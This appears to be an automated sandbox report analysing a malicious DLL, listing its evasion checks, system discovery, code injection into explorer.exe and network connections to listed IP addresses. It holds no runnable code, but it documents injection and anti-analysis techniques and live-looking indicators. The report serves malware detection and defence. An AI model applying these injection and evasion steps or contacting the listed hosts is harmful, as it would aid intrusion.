                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\rundll32.exeCode function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,23_2_0000029F3B904D00
                  Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,30_2_089D8424
                  Source: C:\Windows\explorer.exeCode function: GetAdaptersInfo,GetAdaptersInfo,30_2_089D7274
                  Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 1756Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 8119Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 566
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3224
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 5848
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 883
                  Source: C:\Windows\System32\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_23-19961
                  Source: C:\Windows\System32\loaddll64.exe TID: 1356Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\rundll32.exe TID: 7660Thread sleep count: 1756 > 30Jump to behavior
                  Source: C:\Windows\System32\rundll32.exe TID: 7660Thread sleep time: -105360000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\rundll32.exe TID: 7660Thread sleep count: 8119 > 30Jump to behavior
                  Source: C:\Windows\System32\rundll32.exe TID: 7660Thread sleep time: -487140000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 8172Thread sleep count: 566 > 30
                  Source: C:\Windows\explorer.exe TID: 8172Thread sleep time: -56600s >= -30000s
                  Source: C:\Windows\explorer.exe TID: 8164Thread sleep count: 3224 > 30
                  Source: C:\Windows\explorer.exe TID: 8164Thread sleep time: -3224000s >= -30000s
                  Source: C:\Windows\explorer.exe TID: 8164Thread sleep count: 5848 > 30
                  Source: C:\Windows\explorer.exe TID: 8164Thread sleep time: -5848000s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\explorer.exeCode function: 30_2_089DA8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,30_2_089DA8E0
                  Source: C:\Windows\explorer.exeCode function: 30_2_089D2B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,30_2_089D2B28
                  Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 60000Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread delayed: delay time: 60000Jump to behavior
                  Source: Amcache.hve.9.drBinary or memory string: VMware
                  Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
                  Source: explorer.exe, 0000001E.00000000.1578935505.000000000888E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
                  Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: explorer.exe, 0000001E.00000000.1578935505.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008796000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
                  Source: rundll32.exe, 00000017.00000002.2578798813.0000029F3B7FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.2575784572.0000029F39C98000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1578935505.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1578935505.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2586948409.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: explorer.exe, 0000001E.00000002.2586948409.00000000088E9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: explorer.exe, 0000001E.00000002.2586948409.00000000088E9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                  Source: Amcache.hve.9.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: explorer.exe, 0000001E.00000003.2292493778.0000000008979000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00`
                  Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: explorer.exe, 0000001E.00000002.2586948409.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                  Source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                  Source: Amcache.hve.9.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.9.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.9.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: explorer.exe, 0000001E.00000000.1575778236.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
                  Source: Amcache.hve.9.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                  Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.9.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: explorer.exe, 0000001E.00000002.2586948409.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
                  Source: Amcache.hve.9.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.9.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.9.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.9.drBinary or memory string: VMware Virtual RAM
                  Source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                  Source: Amcache.hve.9.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: explorer.exe, 0000001E.00000002.2586948409.00000000088E9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
                  Source: explorer.exe, 0000001E.00000000.1575778236.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: explorer.exe, 0000001E.00000002.2586948409.00000000088E9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 0000001E.00000000.1575778236.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: Amcache.hve.9.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_23-19527
                  Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B8ECCE0 LdrGetProcedureAddress,23_2_0000029F3B8ECCE0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800402A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00000001800402A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018004A5BC GetProcessHeap,3_2_000000018004A5BC
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800402A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00000001800402A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018005C2BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000000018005C2BC

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\rundll32.exeNetwork Connect: 82.115.223.39 8041Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 443
                  Source: C:\Windows\System32\rundll32.exeNetwork Connect: 80.78.24.30 8041Jump to behavior
                  Allocates memory in foreign processes
                  Source: C:\Windows\System32\rundll32.exeMemory allocated: C:\Windows\explorer.exe base: 89D0000 protect: page execute and read and writeJump to behavior
                  Contains functionality to inject threads in other processes
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_3_00007DF49BA40100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,23_3_00007DF49BA40100
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000000273F41380 Sleep,SleepEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,23_2_0000000273F41380
                  Creates a thread in another existing process (thread injection)
                  Source: C:\Windows\System32\rundll32.exeThread created: C:\Windows\explorer.exe EIP: 89D0000Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 89D0000 value starts with: 4D5AJump to behavior
                  Injects code into the Windows Explorer (explorer.exe)
                  Source: C:\Windows\System32\rundll32.exeMemory written: PID: 3504 base: 89D0000 value: 4DJump to behavior
                  Modifies the context of a thread in another process (thread injection)
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: 7468Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: 7468Jump to behavior
                  Sets debug register (to hijack the execution of another thread)
                  Source: C:\Windows\System32\rundll32.exeThread register set: 7468 1Jump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 89D0000Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1Jump to behavior
                  Source: explorer.exe, 0000001E.00000002.2572889646.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575987079.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                  Source: explorer.exe, 0000001E.00000002.2572889646.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000002.2584248652.0000000004480000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575987079.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 0000001E.00000002.2572889646.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575987079.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 0000001E.00000002.2572889646.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575987079.0000000001071000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: explorer.exe, 0000001E.00000002.2567357911.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000000.1575778236.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanq
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_0000000180053038
                  Source: C:\Windows\System32\rundll32.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,3_2_0000000180052534
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,3_2_0000000180052904
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,3_2_00000001800529D4
                  Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,3_2_0000000180048A24
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,3_2_0000000180047A78
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,3_2_0000000180047BBC
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,3_2_0000000180047C44
                  Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0000000180052E38
                  Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180048AB4 GetSystemTimeAsFileTime,3_2_0000000180048AB4
                  Source: C:\Windows\System32\rundll32.exeCode function: 23_2_0000029F3B904D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,23_2_0000029F3B904D00
                  Source: C:\Windows\explorer.exeCode function: 30_2_089E00E8 RtlGetVersion,30_2_089E00E8
                  Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
